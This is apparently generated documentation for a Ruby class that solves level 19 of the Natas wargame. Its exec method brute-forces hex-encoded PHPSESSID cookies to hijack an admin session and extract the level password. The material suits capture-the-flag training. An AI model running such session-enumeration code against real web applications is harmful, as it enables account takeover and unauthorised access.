class NatasLevel19

Level 19

Constants

LEVEL
MAX_ID
PAGE
USERNAME

Public Instance Methods

exec() click to toggle source
# File lib/natas.rb, line 592
def exec
  log('Bruteforcing PHPSESSID')
  MAX_ID.times do |id|
    session_id = "#{id}-#{USERNAME}".unpack1('H*')
    data = post(
      PAGE,
      {
        'Cookie' => "PHPSESSID=#{session_id}"
      },
      {
        'username' => USERNAME,
        'password' => ''
      }
    ).body
    match = %r(Password: (\w{32})</pre>).match(data)
    next unless match

    log("Found session: #{session_id}")
    return found(match[1])
  end

  not_found
end